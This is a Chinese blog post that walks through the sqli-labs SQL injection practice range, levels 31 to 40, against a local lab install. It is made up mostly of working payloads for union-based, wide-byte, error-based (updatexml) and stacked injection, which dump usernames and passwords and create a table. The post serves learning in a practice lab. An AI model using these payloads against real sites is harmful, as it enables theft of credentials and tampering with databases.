AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

sql-lib 搭建&31-40关

2022-12-02 176
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sql-lib 搭建&31-40关

sql-lib靶场搭建-windows操作系统

下载phpstudy,下载地址:https://www.xp.cn/download.html

安装好

https://github.com/Audi-1/sqli-labs

将下载好后解压放到www下新建wwww.guiltyfet.com目录

同步hosts文件

第31关

在双引号后面添加括号进行闭合

http://www.guiltyfet.com/sqli/Less-31/?id=-1%22)union%20select%201,2,database()%20–+

或者

?id=1&id=0") union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

区分大小写用%23闭合

获得用户名密码

http://www.guiltyfet.com/sqli/Less-31/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+

第32关

这关是宽字节绕过引号转义

原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6’ 这样的构造时,’ 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用。

获得数据库名 ?id=-1%E6’ union select 1,version(),database() --+

在爆列的时候我们要用到‘user’,有单引号,我们用十六进制编码替代,users 使用十六进制编码得到7573657273,构造为0x7573657273

获取列名   ?id=-1%E6' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name =0x7573657273--+

http://www.guiltyfet.com/sqli/Less-32/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

第33关

和32一样

http://www.guiltyfet.com/sqli/Less-33/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

第34关

获取数据库版本和数据库名 uname=admin%99’ union select version(),database()–+&passwd=admin&submit=Submit

POST /sqli/Less-34/ HTTP/1.1
Host: www.guiltyfet.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://www.guiltyfet.com
Connection: close
Referer: http://www.guiltyfet.com/sqli/Less-34/
Upgrade-Insecure-Requests: 1
uname=admin%99'  union select 1,group_concat(username,0x3b,password) from users#&passwd=admin&passwd=admin&submit=Submit

获取数据库密码

第35关

获得版名库名

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,version(),database()--+

获得表明

http://www.guiltyfet.com/sqli/Less-35/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆列名 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#

爆用户名和密码

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,2,group_concat(username,0x3b,password)%20from%20users#

第36关

爆库

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆表

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),0x7e),1)--+

通过宽字节 %df 或者utf-16来解决

爆用户密码

http://www.guiltyfet.com/sqli/Less-36/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

宽字节注入

第37关

输入admin/admin抓包

%bb’ union select 1,2#

爆库
uname=admin%bb' union select database(),user()#&passwd=admin&submit=Submit

爆表
uname=admin%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=admin&submit=Submit

爆字段

admin%bb' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

爆数据
uname=admin%bb' union select group_concat(username),group_concat(password) from users#
&passwd=admin&submit=Submit

第38关

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名
http://www.guiltyfet.com/sqli/Less-38/?id=?id=0%FE' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获得数据
http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

新建表
http://www.guiltyfet.com/sqli/Less-38/?id=1';create table test like users;%23

在查询就有新建的表

第39关

http://www.guiltyfet.com/sqli/Less-39/?id=0%20union%20select%201,version(),database()%20%23

获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

第40关

加括号,堆叠注入

获得列名
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

爆数据
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

文章标签:
Windows
数据安全/隐私保护
数据库
5q2a2sugf4ej6
目录
相关文章
冷色系456
|
SQL Oracle 关系型数据库
第五章:OB Server的SQL引擎
第五章:OB Server的SQL引擎
冷色系456
165 0
仅此而已bo
|
SQL 数据库 Python
Python 数据库Insert语句脚本生成工具(SQL Server)
Python 数据库Insert语句脚本生成工具(SQL Server)
仅此而已bo
390 0
Python 数据库Insert语句脚本生成工具(SQL Server)
陶然同学
|
SQL 存储 JSON
【MySQL高级】优化SQL步骤
【MySQL高级】优化SQL步骤
陶然同学
112 0
【MySQL高级】优化SQL步骤
lemotree
oracle-优化-如何使用coe_xfr_sql_profile_绑定手工新生成的执行计划
lemotree
466 0
lemotree
|
SQL BI
oracle-优化-如何对sql创建和管理sql_profile
lemotree
389 0
游客r426lz522voxi
|
SQL 存储 大数据
SQL Server注意事项总结,高级程序员必备!
SQL数据库开发
游客r426lz522voxi
151 0
powdba
|
SQL 关系型数据库 应用服务中间件
SQL审核平台--Yearning
powdba
9092 0
SQL审核平台--Yearning
德哥
|
SQL 移动开发 关系型数据库
PostgreSQL 与 MSSQL(SQL Server) 之间 数据相互迁移、导入、导出测试
标签 PostgreSQL , ms sql , SQL Server 背景 测试表结构 create table test (id int, info text); 从 PostgreSQL 导入 MSSQL MS SQL bcp与BULK INSERT都不支持stdin,所以我这里使用落地到文件的方法,从PostgreSQL导入MS SQL。
德哥
5234 0
幸福的红帆
|
SQL
高性能日记--show profile剖析sql语句
幸福的红帆
1434 0
科技小能手
|
SQL 关系型数据库 数据库管理
mysql5.6使用profile工具分析sql
科技小能手
1194 0

热门文章

最新文章

  • 1
    基于区块链的机器学习模型创建方案
  • 2
    阿里云服务器ECS搭建个人网站新手教程(超详细)
  • 3
    上云,你需要了解的账号管理模型
  • 4
    RDS入门——Excel文件转存到RDS数据库实践
  • 5
    优秀的代码都是如何分层的?
  • 6
    3、Python与设计模式--建造者模式
  • 7
    跟阿里云技术专家阙寒一起深度了解视频直播CDN技术
  • 8
    当人工智能遇上区块链,会发生什么?
  • 9
    力挑VMWare 红帽推新虚拟化技术
  • 10
    Ext 4 概述(七)之面板Panel & 杂项
  • 1
    自学记录HarmonyOS Next DRM API 13:构建安全的数字内容保护系统
    42
  • 2
    《MaxFrame:数据处理的卓越实践与提升》
    55
  • 3
    《DataWorks:数据处理的卓越实践与改进思考》
    50
  • 4
    三维球体空间中光线反射模拟与三维点云提取matlab仿真
    46
  • 5
    《多模态数据信息提取解决方案的体验与部署》
    45
  • 6
    基于PSO优化的PV光伏发电系统simulink建模与仿真
    52
  • 7
    数据链中常见电磁干扰matlab仿真,对比噪声调频,线性调频,噪声,扫频,灵巧五种干扰模型
    47
  • 8
    《破局之路:人工智能产业的健康发展》
    38
  • 9
    《强化学习算法在动态环境中的优化之路》
    36
  • 10
    《大模型训练成本高,如何在不牺牲性能的前提下破局》
    40

    • 相关课程

    更多
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • SQL进阶及查询

    • 相关电子书

    更多
  • PostgresChina2018_董红禹_SQL_Server迁移PG经验分享
  • SQL Server云化思考与实践
  • SQL Server 云化思考与实践

    • 相关实验场景

    更多
  • SQLServer数据库的创建
  • PolarDB MySQL自动SQL限流
  • 如何开通SQL Server的专属集群
    • 下一篇
    手把手教你白嫖阿里云服务器(免费领服务器)